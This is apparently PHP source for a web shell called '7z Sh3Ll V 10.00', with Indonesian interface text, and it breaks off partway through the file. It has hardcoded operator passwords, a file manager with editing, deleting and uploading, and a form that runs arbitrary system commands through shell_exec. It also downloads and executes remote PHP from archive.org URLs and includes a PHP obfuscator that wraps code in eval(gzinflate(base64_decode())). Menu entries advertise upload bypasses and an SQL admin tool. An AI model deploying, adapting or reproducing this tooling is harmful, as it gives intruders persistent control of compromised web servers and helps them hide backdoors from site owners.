<?php
session_start();


if (isset($_GET['logout'])) {
    session_destroy();
    header("Location: " . $_SERVER['PHP_SELF']);
    exit;
}


function includeRemoteCode($url) {
    $code = file_get_contents($url);

    if ($code === false) {
        http_response_code(500);
        exit("Gagal mengambil konten dari $url");
    }

    $tmpFile = tempnam(sys_get_temp_dir(), 'phpcode_') . '.php';
    file_put_contents($tmpFile, $code);

    include $tmpFile;

    unlink($tmpFile); // hapus file sementara setelah digunakan
    exit;
}

if ($_GET['Tools'] === 'Sitemap') {
    includeRemoteCode('https://ia601409.us.archive.org/13/items/sitemap_20250719_1700/sitemap.txt');
}

if ($_GET['Tools'] === 'Mekminer') {
    includeRemoteCode('https://ia601002.us.archive.org/14/items/adminerno_20250723/adminerno.txt');
}

if ($_GET['Tools'] === 'MekiFinder') {
    includeRemoteCode('https://ia902905.us.archive.org/6/items/mekifinder_20250717/Mekifinder.txt');
}


function formatSize($bytes) {
    $units = ['B', 'KB', 'MB', 'GB', 'TB'];
    $i = 0;
    while ($bytes >= 1024 && $i < count($units) - 1) {
        $bytes /= 1024;
        $i++;
    }
    return round($bytes, 2) . ' ' . $units[$i];
}


// Daftar username dan password
$users = [
    'LOYZ' => ['pass' => 'loyztab', 'role' => 'EDITOR'],
    'tujuhjet' => ['pass' => '7zxixixi', 'role' => 'PEMILIK'],
    'sniper' => ['pass' => 'snipertab', 'role' => 'SEO'],
    'maichen' => ['pass' => 'maichentab', 'role' => 'OPERATOR'],
];


if (!isset($_SESSION['authorized'])) {
    if (isset($_POST['user'], $_POST['pass'])) {
        $username = $_POST['user'];
        $password = $_POST['pass'];
        if (isset($users[$username]) && $users[$username]['pass'] === $password) {
            $_SESSION['authorized'] = true;
            $_SESSION['username'] = $username;
            $_SESSION['role'] = $users[$username]['role'];
            header("Location: " . $_SERVER['PHP_SELF']);
            exit;
        } else {
            $error = "Username atau password salah.";
        }
    }

    echo '<!DOCTYPE html>
    <html lang="id">
    <head>
        <meta charset="UTF-8">
        <title>🔐 Masuk ke 7z Sh3Ll</title>
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <style>
:root {
            --bg-dark: #0d0d1a;
            --bg-box: #1a1a2e;
            --accent1: #26c6da;
            --accent2: #7c4dff;
            --fg-light: #e0f7fa;
            --text-glow: 0 0 6px var(--accent1);
            --error-color: #ff4d4d;
        }

        body {
            margin: 0;
            padding: 0;
            background: #040204;
            background-size: 1000px 500px;
            background-repeat: no-repeat;
            background-position: center;
            background-image: url('https://i.pinimg.com/originals/61/b6/a5/61b6a52b16d211ed9bd3c14bbfdd617f.gif');
            font-family: "Courier New", monospace;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            color: var(--fg-light);
            overflow: hidden;
        }

        .login-box {
            background: #09311580;
            padding: 2.8rem 2rem;
            border-radius: 15px;
            box-shadow: 0 0 20px #0eba12, 0 0 30px var(--accent2);
            text-align: center;
            width: 90%;
            max-width: 400px;
            animation: fadeIn 1s ease-out;
        }

        .login-box img {
            width: 110px;
            margin-bottom: 1.2rem;
            filter: drop-shadow(0 0 10px var(--accent1));
        }

        h2 {
            margin-bottom: 1.5rem;
            font-size: 1.4rem;
            color: #9bff00;
            text-shadow: 0 0 8px var(--accent2);
        }

        select, input[type="password"], input[type="text"] {
            width: 100%;
            padding: 0.65rem;
            background: #1d3321;
            border: 2px solid #318e37;
            border-radius: 10px;
            color: var(--fg-light);
            font-size: 1rem;
            margin-bottom: 1rem;
            transition: box-shadow 0.2s ease;
        }

        select:focus, input:focus {
            outline: none;
            box-shadow: 0 0 8px var(--accent2);
        }

        button {
            width: 100%;
            padding: 0.6rem;
            background: linear-gradient(135deg, #c4ff07, #4df2ff);
            border: none;
            border-radius: 10px;
            font-weight: bold;
            color: #000;
            font-size: 1rem;
            cursor: pointer;
            transition: transform 0.2s ease, box-shadow 0.2s ease;
            box-shadow: 0 0 10px #00ff3b;
        }

        button:hover {
            transform: scale(1.06);
            box-shadow: 0 0 16px var(--accent2);
        }

        .error {
            color: var(--error-color);
            font-size: 0.95rem;
            margin-bottom: 1rem;
            text-shadow: 0 0 3px var(--error-color);
        }

        @keyframes fadeIn {
            from { opacity: 0; transform: translateY(-20px); }
            to { opacity: 1; transform: translateY(0); }
        }

</style>

    </head>
   <body>
        <div class="login-box">
           <div style="display: flex; justify-content: center; align-items: center; gap: 20px;">
  <img src="https://i.imgur.com/G8Nby02.png" alt="7z Logo">
  <h2>x</h2>
  <img src="https://i.imgur.com/vlTtm4X.png" alt="TAB Logo">
</div>

            <h2>Masuk ke 7z Sh3Ll V.10 0</h2>
            '.(isset($error) ? '<div class="error">'.$error.'</div>' : '').'
            <form method="post">
                <select name="user" required>
                    <option value="" disabled selected>👤 Pilih Pengguna</option>';
                    foreach ($users as $u => $_) {
                        echo "<option value=\"$u\">$u</option>";
                    }
            echo '</select>
                <input type="password" name="pass" placeholder="🔑 Masukkan Password" required>
                <button type="submit">Masuk</button>
            </form>
	<br><footer>
    Dibuat oleh <span style="color: yellow;">7z</span> &copy; 2025 — <span style="color: orange;">7z Sh3Ll V 10.00</span>
</footer>
        </div>
    </body>
    </html>';
    exit;
}
?>
<?php if (isset($_GET['Tools']) && $_GET['Tools'] === 'Toolslain'): ?>

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>7z TOOLS LAINNYA</title>
  <style>
    html, body {
      height: 100%;
      margin: 0;
      padding: 0;
    }

    body {
      display: flex;
      flex-direction: column;
      font-family: 'Segoe UI', sans-serif;
      background-color: #121212;
      color: #e0e0e0;
    }

    .wrapper {
      flex: 1;
      display: flex;
      flex-direction: column;
    }

    header {
      background-color: #1e1e2f;
      padding: 20px;
      text-align: center;
      font-size: 24px;
      color: #00cec9;
    }

    nav {
      background-color: #2b2b3c;
      display: flex;
      justify-content: center;
      padding: 10px 0;
    }

    nav a {
      color: #dcdcdc;
      margin: 0 20px;
      text-decoration: none;
      font-weight: bold;
    }

    nav a:hover, nav a.active {
      color: #00cec9;
    }

    main {
      flex: 1;
    }

    section {
      padding: 30px;
      max-width: 800px;
      margin: 0 auto;
    }

    h2 {
      border-bottom: 1px solid #444;
      padding-bottom: 10px;
    }

    textarea, input, select {
      width: 100%;
      padding: 12px;
      margin-top: 10px;
      background-color: #1f1f2e;
      color: #eee;
      border: 1px solid #333;
      border-radius: 5px;
      font-family: Consolas, monospace;
    }

    input[type="submit"] {
      background-color: #00b894;
      cursor: pointer;
      font-weight: bold;
      margin-top: 15px;
    }

    input[type="submit"]:hover {
      background-color: #00cec9;
    }

    .result {
      margin-top: 15px;
      background-color: #1f1f2e;
      border: 1px solid #00b894;
      padding: 15px;
      border-radius: 5px;
      color: #c3f3e2;
      white-space: pre-wrap;
    }

    footer {
      background-color: #1e1e2f;
      color: #aaa;
      text-align: center;
      padding: 15px 0;
      font-size: 14px;
    }
  </style>
</head>
<body>

<div class="wrapper">
  <header>
    <center><img src="https://i.imgur.com/G8Nby02.png" alt="Logo"></center>
    TOOLS LAINNYA by 7z
  </header>

  <nav>
  <a href="?dir=<?=urlencode($dir) ?>">Kembali ke 7z sh3Ll</a>
  <a href="?Tools=Toolslain&menu=encode" class="<?= ($_GET['menu'] ?? '') === 'encode' ? 'active' : '' ?>">Encode & Decode</a>
  <a href="?Tools=Toolslain&menu=obfuscator" class="<?= ($_GET['menu'] ?? '') === 'obfuscator' ? 'active' : '' ?>">PHP Obfuscator</a>
  <a href="?Tools=Toolslain&menu=reverse" class="<?= ($_GET['menu'] ?? '') === 'reverse' ? 'active' : '' ?>">Text Reverser</a>
  <a href="?Tools=Toolslain&menu=hash" class="<?= ($_GET['menu'] ?? '') === 'hash' ? 'active' : '' ?>">Hash Generator</a>
</nav>


  <main>
    <?php
$menu = $_GET['menu'] ?? '';


if ($menu === 'encode') {
    ?>
    <section>
      <h2>Encode & Decode</h2>
     <form method="post">
    <textarea name="code" placeholder="Masukkan Kode Disini..."><?php echo htmlspecialchars($_POST['code'] ?? ''); ?></textarea>

    <select name="ope" required>
        <option value="">-- Pilih Metode --</option>
        <option value="urlencode">url</option>
        <option value="base64">base64</option>
        <option value="ur">convert_uu</option>
        <option value="json">json</option>
        <option value="gzinflates">gzinflate - base64</option>
        <option value="str2">str_rot13 - base64</option>
        <option value="gzinflate">str_rot13 - gzinflate - base64</option>
        <option value="gzinflater">gzinflate - str_rot13 - base64</option>
        <option value="gzinflatex">gzinflate - str_rot13 - gzinflate - base64</option>
        <option value="gzinflatew">complex mixed chain</option>
        <option value="str">str_rot13 - gzinflate - str_rot13 - base64</option>
        <option value="url">base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64</option>
    </select>

    <input type="submit" name="submit" value="Encode" />
    <input type="submit" name="submits" value="Decode" />
</form>

<?php
$text = $_POST['code'] ?? '';
$op = $_POST['ope'] ?? '';
$encodeBtn = $_POST['submit'] ?? null;
$decodeBtn = $_POST['submits'] ?? null;
$codi = '';

if ($encodeBtn) {
    switch ($op) {
        case 'base64': $codi = base64_encode($text); break;
        case 'str': $codi = base64_encode(str_rot13(gzdeflate(str_rot13($text)))); break;
        case 'json': $codi = json_encode(utf8_encode($text)); break;
        case 'gzinflate': $codi = base64_encode(gzdeflate(str_rot13($text))); break;
        case 'gzinflater': $codi = base64_encode(str_rot13(gzdeflate($text))); break;
        case 'gzinflatex': $codi = base64_encode(gzdeflate(str_rot13(gzdeflate($text)))); break;
        case 'gzinflatew':
            $codi = base64_encode(gzdeflate(str_rot13(rawurlencode(
                gzdeflate(convert_uuencode(base64_encode(str_rot13(
                    gzdeflate(convert_uuencode(rawurldecode(str_rot13($text))))
                ))))
            ))));
            break;
        case 'gzinflates': $codi = base64_encode(gzdeflate($text)); break;
        case 'str2': $codi = base64_encode(str_rot13($text)); break;
        case 'urlencode': $codi = rawurlencode($text); break;
        case 'ur': $codi = convert_uuencode($text); break;
        case 'url': $codi = base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($text)))))); break;
        default: $codi = "Invalid encode operation."; break;
    }
    echo "<div style='color:cyan;' class='output-label'>&nbsp;Hasil :</div>";
    echo "<div class='output'><textarea readonly>" . htmlentities($codi) . "</textarea></div>";
}

if ($decodeBtn) {
    try {
        switch ($op) {
            case 'base64': $codi = base64_decode($text); break;
            case 'str': $codi = str_rot13(gzinflate(str_rot13(base64_decode($text)))); break;
            case 'json': $codi = utf8_decode(json_decode($text)); break;
            case 'gzinflate': $codi = str_rot13(gzinflate(base64_decode($text))); break;
            case 'gzinflater': $codi = gzinflate(str_rot13(base64_decode($text))); break;
            case 'gzinflatex': $codi = gzinflate(str_rot13(gzinflate(base64_decode($text)))); break;
            case 'gzinflatew':
                $codi = str_rot13(rawurldecode(convert_uudecode(gzinflate(str_rot13(
                    base64_decode(convert_uudecode(gzinflate(rawurldecode(
                        str_rot13(gzinflate(base64_decode($text)))
                    ))))
                )))));
                break;
            case 'gzinflates': $codi = gzinflate(base64_decode($text)); break;
            case 'str2': $codi = str_rot13(base64_decode($text)); break;
            case 'urlencode': $codi = rawurldecode($text); break;
            case 'ur': $codi = convert_uudecode($text); break;
            case 'url': $codi = base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode($text)))))); break;
            default: $codi = "Invalid decode operation."; break;
        }
        echo "<div class='output-label'>Hasil:</div>";
        echo "<div class='output'><textarea readonly>" . htmlentities($codi) . "</textarea></div>";
    } catch (Exception $e) {
        echo "<p class='error'>Error decoding input: " . htmlspecialchars($e->getMessage()) . "</p>";
    }
}
?>

    </section>
    <?php
} elseif ($menu === 'reverse') {
    ?>
    <section>
      <h2>Text Reverser</h2>
      <form method="post">
        <textarea name="reverseText" placeholder="Masukkan teks untuk reverse..."><?php echo htmlspecialchars($_POST['reverseText'] ?? '') ?></textarea>
        <input type="submit" name="reverseBtn" value="Reverse Text">
      </form>
      <?php
      if (isset($_POST['reverseBtn'])) {
          $reversed = strrev($_POST['reverseText'] ?? '');
          echo "<div class='result'><strong>Reversed Text:</strong><br>$reversed</div>";
      }
      ?>
    </section>
    <?php
} elseif ($menu === 'hash') {
    ?>
    <section>
      <h2>Hash Generator</h2>
      <form method="post">
        <input type="text" name="hashInput" placeholder="Masukkan Hash..." value="<?php echo htmlspecialchars($_POST['hashInput'] ?? '') ?>">
        <select name="hashType">
          <option value="md5">MD5</option>
          <option value="sha1">SHA1</option>
          <option value="sha256">SHA256</option>
        </select>
        <input type="submit" name="hashBtn" value="Generate Hash">
      </form>
      <?php
      if (isset($_POST['hashBtn'])) {
          $text = $_POST['hashInput'] ?? '';
          $algo = $_POST['hashType'] ?? 'md5';
          $hash = hash($algo, $text);
          echo "<div class='result'><strong>$algo Hash:</strong><br>$hash</div>";
      }
      ?>


    </section>
<?php
} elseif ($menu === 'obfuscator') {
?>
<section>
  <h2>PHP Obfuscator</h2>
  <form method="post">
    <textarea name="obf_code" placeholder="Masukkan kode PHP..."><?php echo htmlspecialchars($_POST['obf_code'] ?? '') ?></textarea>
    <input type="submit" name="obfBtn" value="Obfuscate">
  </form>

  <?php
if (isset($_POST['obfBtn'])) {
    $inputCode = $_POST['obf_code'] ?? '';

    // Hapus tag PHP agar tidak dobel
    $inputCode = preg_replace('/<\?php|\?>/', '', $inputCode);

    // Kompres dan encode input
    $encoded = base64_encode(gzdeflate($inputCode));

    // Buat isi Lix berdasarkan input — misalnya dari hash
    $lixValue = '==' . substr(bin2hex(sha1($inputCode, true)), 0, 24); // hex 24 char

    // Susun hasil obfuscasi
    $final = "<?php\n";
    $final .= "\$Cyto = \"$encoded\";\n";
    $final .= "\$Lix = \"$lixValue\";\n";
    $final .= "eval(htmlspecialchars_decode(gzinflate(base64_decode(\$Cyto))));\n";
    $final .= "exit;\n?>";

    // Tampilkan hasil
    echo "<div class='result'><strong>Hasil Obfuscate:</strong><br><textarea readonly style='min-height:200px; width:100%;'>" .
        htmlspecialchars($final) .
        "</textarea></div>";
}
?>


</section>


    <?php
} else {
    echo "<section><h2>Silahkan pilih menu Tools diatas !</h2><p style='text-align:center;'>TAB x 7z</p></section>";
}
?>

  </main>
</div>

<footer>
    Dibuat oleh <span style="color: yellow;">7z</span> &copy; <?= date('Y') ?> — <span style="color: orange;">7z Sh3Ll V 10.00</span>
</footer>
</body>
</html>
<?php exit;?>
<?php endif; ?>

<?php

$role = $_SESSION['role'];
$pemilik = $role === 'admin';
$anggota= $role === 'editor';

// Helper
function show_denied($aksi) {
    $currentRole = htmlspecialchars($_SESSION['role']);
    echo "<div style='color:red; font-weight:bold;'>🚫 Role ( $currentRole ) - Akses ditolak untuk $aksi!</div>";
}

$dir = realpath(isset($_GET['dir']) ? $_GET['dir'] : __DIR__);
if (!$dir || !is_dir($dir)) $dir = realpath(__DIR__);
$message = '';

function safeName($name) {
    return preg_replace('/[^a-zA-Z0-9_\-\.]/', '', basename($name));
}

// Create Folder
if (isset($_POST['newfolder'])) {
    $folder = safeName($_POST['newfolder']);
    if ($folder) {
        mkdir("$dir/$folder");
        $message = "Folder '$folder' dibuat.";
    }
}

// Create File
if (isset($_POST['newfile'])) {
    $file = safeName($_POST['newfile']);
    if ($file) {
        file_put_contents("$dir/$file", '');
        $message = "File '$file' dibuat.";
    }
}

// Delete
if (isset($_GET['delete'])) {
    // Cek apakah user memiliki role yang diizinkan
    if (!in_array($_SESSION['role'], ['PEMILIK', 'SEO', 'OPERATOR'])) {
        return show_denied("menghapus file/folder");
    }

    $target = "$dir/" . safeName($_GET['delete']);
    if (is_dir($target)) @rmdir($target);
    else @unlink($target);
    $message = "Item dihapus.";
}

// Rename
if (isset($_POST['rename_old'], $_POST['rename_new'])) {
    $old = "$dir/" . safeName($_POST['rename_old']);
    $new = "$dir/" . safeName($_POST['rename_new']);
    if (file_exists($old)) {
        rename($old, $new);
        $message = "Rename berhasil.";
    }
}

// Edit File
if (isset($_POST['edit_file']) && isset($_POST['edit_content'])) {
    file_put_contents("$dir/" . safeName($_POST['edit_file']), $_POST['edit_content']);
    $message = "File disimpan.";
}

// Upload
if (isset($_FILES['upload_file']) && $_FILES['upload_file']['error'] === UPLOAD_ERR_OK) {
    $uploadName = safeName($_FILES['upload_file']['name']);
    move_uploaded_file($_FILES['upload_file']['tmp_name'], "$dir/$uploadName");
    $message = "Upload berhasil.";
}

// File Edit View
$editFile = null;
$editContent = '';
if (isset($_GET['edit'])) {
    $editFile = safeName($_GET['edit']);
    $editContent = @file_get_contents("$dir/$editFile");
}

$dir = isset($_GET['dir']) ? $_GET['dir'] : getcwd();
$dir = realpath($dir); // pastikan path aman
if (!is_dir($dir)) $dir = getcwd(); // fallback jika path tidak valid

$shellOutput = null;

if (isset($_POST['cmd'])) {
    if ($role === 'EDITOR') {
        $shellOutput = '🚫 Akses ditolak: Role "EDITOR" tidak diizinkan menjalankan perintah shell.';
    } else {
        $cmd = $_POST['cmd'];
        // Jalankan perintah di direktori yang sedang aktif
        $shellOutput = shell_exec("cd " . escapeshellarg($dir) . " && " . $cmd . " 2>&1");
    }
}

// File Listing
$files = scandir($dir);

// Breadcrumb
function makeBreadcrumb($dir) {
    $parts = explode(DIRECTORY_SEPARATOR, $dir);
    $crumbs = [];
    $path = '';
    foreach ($parts as $i => $part) {
        if ($part === '') continue;
        $path .= DIRECTORY_SEPARATOR . $part;
        $name = htmlspecialchars($part);
        $url = '?dir=' . urlencode($path);
        if ($i === count($parts) - 1) {
            // Crumb terakhir: tidak clickable, beda style
            $crumbs[] = "<span class='breadcrumb-current'>$name</span>";
        } else {
            $crumbs[] = "<a href='$url' class='breadcrumb-link'>$name</a>";
        }
    }
    return implode('<span class="breadcrumb-sep"> &gt; </span>', $crumbs);
}
?>

<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>7z Sh3Ll V 10.00</title>
<style>
    body {
    background: radial-gradient(circle at top left, #0f0f23, #000014);
    color: #00fff7;
    font-family: 'Courier New', monospace;
    margin: 0;
    padding: 2rem;
    max-width: 960px;
    margin: auto;
}
h2 {
    text-align: center;
    color: #55dfd7;
    font-size: 2rem;
    margin-bottom: 1.5rem;
    text-shadow: 0 0 10px #ff00d4;
}
img {
    display: block;
    margin: auto;
    width: 180px;
    filter: drop-shadow(0 0 10px #00fff7);
}

.menu-7zback {
    display: flex;
    justify-content: center;
    gap: 1.5rem;
    margin-bottom: 2rem;
    flex-wrap: wrap;
}

.menu-7zback a {
    padding: 0.75rem 1.5rem;
    border-radius: 12px;
    background: linear-gradient(135deg, #111122, #1a1a2e); /* dasar gelap */
    color: #00fff7;
    font-weight: 600;
    text-decoration: none;
    box-shadow: 0 0 12px #00fff7, 0 0 24px #7f00ff;
    border: 1px solid #00fff7;
    transition: all 0.3s ease;
    text-shadow: 0 0 4px #00fff7;
}

.menu-7zback a:hover {
    transform: scale(1.08);
    box-shadow: 0 0 16px #ff00d4, 0 0 32px #00fff7;
    background: linear-gradient(135deg, #1f0033, #003344);
    color: #ffffff;
    text-shadow: 0 0 6px #ff00d4;
}


.menu-bar {
    overflow: hidden;
    max-height: 0;
    opacity: 0;
    transition:
        max-height 0.5s ease-in-out,
        opacity 0.4s ease-in-out,
        padding 0.3s ease-in-out;
    flex-wrap: wrap;
    gap: 10px;
    margin-top: 1rem;
    padding: 0 10px;
    background-color: #1e1e1e;
    border-radius: 10px;
    box-shadow: 0 0 10px rgba(0, 255, 255, 0.2);
    justify-content: center;
    display: flex;
    position: relative;
}

.menu-bar.show {
    max-height: 500px;
    opacity: 1;
    padding: 10px;
}

.menu-bar a {
    padding: 10px 16px;
    background-color: #111;
    color: #00ffe1;
    text-decoration: none;
    border-radius: 6px;
    transition: all 0.3s ease-in-out;
    font-family: 'Segoe UI', sans-serif;
    font-size: 14px;
}

.menu-bar a:hover {
    background-color: #00ffe1;
    color: #000;
    box-shadow: 0 0 8px rgba(0, 255, 255, 0.6);
}

.toggle-btn {
    background-color: #111;
    color: white;
    padding: 10px 20px;
    border: 1px solid #00ffe1;
    border-radius: 8px;
    cursor: pointer;
    font-size: 15px;
    font-family: 'Segoe UI', sans-serif;
    margin-top: 1rem;
    transition: background-color 0.3s ease-in-out, color 0.3s ease-in-out;
}

.toggle-btn:hover {
    background-color: #00ffe1;
    color: #000;
}

table {
    width: 100%;
    border-collapse: collapse;
    margin-top: 2rem;
    background: var(--bg-light);
    box-shadow: var(--shadow);
    border-radius: 10px;
    overflow: hidden;
    border: 10px solid var(--border); /* Tambahkan garis tepi luar */
}

th, td {
    padding: 10px;
    border: 1px solid var(--border);
    text-align: left;
    color: var(--fg);
}

th {
    background: var(--bg-alt);
    color: var(--accent);
    font-weight: bold;
}

tr:nth-child(even) {
    background-color: #15151e;
}

tr:hover {
    background-color: #1e1e2a;
    text-shadow: 0 0 6px var(--accent);
}


a {
    color: #00fff7;
    text-decoration: none;
}
a:hover {
    color: #ff00d4;
    text-shadow: 0 0 5px #ff00d4;
}
input, button, textarea {
    font-family: 'Courier New', monospace;
    background: #1b1b2f;
    border: 2px solid #4fc3f7;
    color: #e0f7fa;
    padding: 0.5rem 0.8rem;
    border-radius: 8px;
    transition: all 0.2s ease-in-out;
    box-shadow: 0 0 5px rgba(79, 195, 247, 0.3);
}

input:focus, textarea:focus {
    outline: none;
    border-color: #7c4dff;
    box-shadow: 0 0 10px rgba(124, 77, 255, 0.5);
}

button {
    background: linear-gradient(135deg, #7c4dff, #00bcd4);
    color: #fff;
    font-weight: bold;
    cursor: pointer;
    border: none;
    box-shadow: 0 4px 8px rgba(0,0,0,0.3);
    transition: all 0.25s ease;
}

button:hover {
    transform: translateY(-2px) scale(1.04);
    box-shadow: 0 6px 12px rgba(0,0,0,0.4);
    background: linear-gradient(135deg, #9575cd, #26c6da);
}

textarea {
    width: 100%;
    height: 300px;
    margin-top: 1rem;
}
.breadcrumb {
    margin: 1.5rem 0;
    display: flex;
    flex-wrap: wrap;
    justify-content: center;
    gap: 12px;
    font-family: 'Poppins', sans-serif;
    font-size: 0.9rem;
    letter-spacing: 0.3px;
}

.breadcrumb a {
    padding: 8px 16px;
    background-color: #101a2b;
    color: #76eaff;
    border-radius: 12px;
    border: 1px solid rgba(118, 234, 255, 0.4);
    text-decoration: none;
    box-shadow: 0 0 8px rgba(118, 234, 255, 0.2);
    transition: all 0.3s ease;
    position: relative;
    backdrop-filter: blur(3px);
}

.breadcrumb a::before {
    content: "»";
    margin-right: 6px;
    color: #4dd0e1;
    opacity: 0.7;
}

.breadcrumb a:hover {
    background-color: #162034;
    color: #ffffff;
    box-shadow: 0 0 12px #4dd0e1, 0 0 18px #76eaff;
    transform: translateY(-1px);
}

.breadcrumb-current {
    font-weight: bold;
    color: #fff;
    background: linear-gradient(135deg, #00bcd4, #7c4dff);
    border-radius: 12px;
    padding: 8px 16px;
    box-shadow: 0 0 10px rgba(0, 188, 212, 0.5), 0 0 16px rgba(124, 77, 255, 0.4);
    border: none;
}



.form-group {
    margin-bottom: 1.5rem;
}
.form-group label {
    display: block;
    margin-bottom: 0.5rem;
}
.upload-section {
    display: flex;
    flex-wrap: wrap;
    gap: 1rem;
    justify-content: center;
    margin-top: 2rem;
}
.upload-form, .buat-form {
    background: #1e1e2a;
    padding: 1rem 1.5rem;
    border-radius: 10px;
    box-shadow: var(--shadow);
    border: 1px solid var(--border);
    color: var(--fg);
}

footer {
    text-align: center;
    margin-top: 3rem;
    color: #ccc;
    font-size: 0.9rem;
}
</style>
</head>
<body>
<!-- Neon Welcome + Logout Panel -->
<div style="
    display: flex;
    justify-content: space-between;
    align-items: center;
    margin-bottom: 1.5rem;
    padding: 1rem 1.2rem;
    background: linear-gradient(135deg, #111122, #1a1a2e);
    border-radius: 12px;
    box-shadow: 0 0 12px #00fff7, 0 0 24px #7f00ff;
    color: #00fff7;
    font-family: 'Courier New', monospace;
    text-shadow: 0 0 3px #00fff7;
">

    <div style="font-size: 1rem;">
        Selamat Datang Ganteng,
        <span style="color: #00ffd0;">👤 <strong>( <?= htmlspecialchars($_SESSION['role']) ?> )</strong></span>
        <strong style="color: #fff700; text-shadow: 0 0 4px #fff700;">
            <?= htmlspecialchars($_SESSION['username']) ?>
        </strong>
    </div>

    <div>
        <a href="?logout=1" style="
            text-decoration: none;
            font-weight: bold;
            background: linear-gradient(135deg, #330000, #660000);
            color: #ff4d4d;
            padding: 0.5rem 1rem;
            border-radius: 10px;
            box-shadow: 0 0 10px #ff0000, 0 0 20px #ff0040;
            transition: all 0.3s ease;
            display: inline-block;
            text-shadow: 0 0 3px #ff4d4d;
        " onmouseover="this.style.transform='scale(1.08)'; this.style.boxShadow='0 0 16px #ff0040';" onmouseout="this.style.transform='scale(1)'; this.style.boxShadow='0 0 10px #ff0000, 0 0 20px #ff0040';">
            🚪 Keluar
        </a>
    </div>

</div>


<div style="display: flex; justify-content: center; align-items: center; gap: 20px;">
  <img src="https://i.imgur.com/G8Nby02.png" alt="7z Logo">
  <h2>x</h2>
  <img src="https://i.imgur.com/vlTtm4X.png" alt="TAB Logo">
</div>


<h2>7z Sh3Ll V 10.00</h2>
<div class="menu-7zback">
    <a href="?dir=<?= urlencode($dir) ?>">📂 7z Sh3Ll</a>
</div>
<center><button onclick="toggleMenu()" class="toggle-btn" id="toggleBtn">
    📂 Menu Tools <span id="arrowIcon">🔽</span>
</button>
</center>
<!-- Menu Slide -->
<div class="menu-bar" id="menuBar">
    <a href="?Tools=tujuhjetCMD&dir=<?= urlencode($_GET['dir'] ?? getcwd()) ?>">🛠️ Command Shell</a>
    <a href="?Tools=MekiFinder">🔎 Meki Finder</a>
    <a href="?Tools=Mekminer">🗃️ Mekminer/SQL</a>
    <a href="?Tools=Sitemap&dir=<?= urlencode($_GET['dir'] ?? getcwd()) ?>">🛠️ Auto Create Sitemap</a>
    <a href="?Tools=Sitemap2&dir=<?= urlencode($_GET['dir'] ?? getcwd()) ?>">🛠️ Auto Create Sitemap v.2</a>
    <a href="?Tools=UploadURL&dir=<?= urlencode($_GET['dir'] ?? getcwd()) ?>">⬆️ Upload Bypass URL</a>
    <a href="?Tools=SSI7z">⬆️ Upload SSI 7z</a>
    <a href="?Tools=Toolslain">🛠️ Tools Lain</a>
</div>

<script>
const menu = document.getElementById("menuBar");
const toggleBtn = document.getElementById("toggleBtn");
const arrowIcon = document.getElementById("arrowIcon");

function toggleMenu() {
    menu.classList.toggle("show");
    arrowIcon.textContent = menu.classList.contains("show") ? "🔼" : "🔽";
}

// Auto-close saat klik di luar
document.addEventListener("click", function (event) {
    const isClickInsideMenu = menu.contains(event.target);
    const isClickOnToggle = toggleBtn.contains(event.target);

    if (!isClickInsideMenu && !isClickOnToggle && menu.classList.contains("show")) {
        menu.classList.remove("show");
        arrowIcon.textContent = "🔽";
    }
});
</script>
<?php if ($message): ?>
    <div class="msg"><?= htmlspecialchars($message) ?></div>
<?php endif; ?>

<?php if ($editFile): ?>
    <form method="post">
        <input type="hidden" name="edit_file" value="<?= htmlspecialchars($editFile) ?>">
        <textarea name="edit_content"><?= htmlspecialchars($editContent) ?></textarea>
        <button type="submit">💾 Simpan</button>
        <a href="?dir=<?= urlencode($dir) ?>" style="margin-left:10px;">❌ Batal</a>
    </form>
<?php else: ?>

   

    <?php if (isset($_GET['Tools']) && $_GET['Tools'] === 'tujuhjetCMD'): ?>
<div style="margin-top: 2rem; display: flex; justify-content: center;">
    <form method="post" style="background: #1a1a2e; padding: 1rem; border-radius: 10px; box-shadow: 0 0 10px #ff00d4; width: fit-content;">
        <label for="cmd" style="color: #ff00d4; display: block;">💻 Shell Command:</label>
        <center><input type="text" id="cmd" name="cmd" placeholder="contoh: ls -la" required
               style="width: 250px; margin-top: 0.5rem; font-family: monospace; background: #000; color: #0ff; border: 2px solid #00fff7; border-radius: 5px;"></center>
        <button type="submit" style="margin-top: 0.5rem; width: 100%;">Jalankan</button>
    </form>
</div>
<?php endif; ?>
<?php if ($shellOutput): ?>
<div style="margin-top: 2rem; display: flex; justify-content: center;">
    <div style="background: #1a1a2e; padding: 1rem; border-radius: 10px; box-shadow: 0 0 10px #ff00d4; max-width: 100%; overflow: auto;">
        <h3 style="color: #ff00d4;">📄 Output:</h3>
        <pre style="background:#000; color:cyan; padding:1rem; border-radius:8px; max-height: 400px; overflow-x: auto; white-space: pre-wrap;"><?= htmlspecialchars($shellOutput) ?></pre>
    </div>
</div>
<?php endif; ?>

<?php if (isset($_GET['Tools']) && $_GET['Tools'] === 'Sitemap2'): ?>

<?php
function getFileRowCount($filename)
{
    $file = fopen($filename, "r");
    $rowCount = 0;
    while (!feof($file)) {
        fgets($file);
        $rowCount++;
    }
    fclose($file);
    return $rowCount;
}

// Ambil direktori saat ini
$currentDir = isset($_GET['dir']) ? rtrim($_GET['dir'], "/") : '.';
$realPath = realpath($currentDir);

// Validasi direktori
if (!$realPath || !is_dir($realPath)) {
    echo "❌ Direktori tidak valid.";
    exit;
}

// Bangun base URL berdasarkan direktori
$protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? "https" : "http";
$host = $_SERVER['HTTP_HOST'];

$docRoot = realpath($_SERVER['DOCUMENT_ROOT']);
$relativePath = trim(str_replace($docRoot, '', $realPath), DIRECTORY_SEPARATOR);
$relativePath = $relativePath ? '/' . $relativePath . '/' : '/';

$baseURL = $protocol . "://" . $host . $relativePath;

// Ambil file data.txt dari direktori yang sedang dimasuki
$dataFile = $realPath . "/data.txt";
if (!file_exists($dataFile)) {
    echo "❌ File <code>data.txt</code> tidak ditemukan di direktori ini.";
    exit;
}

$fileLines = @file($dataFile, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
if (!$fileLines) {
    echo "❌ Gagal membaca isi <code>data.txt</code>.";
    exit;
}

// Simpan sitemap di direktori yang sedang dimasuki
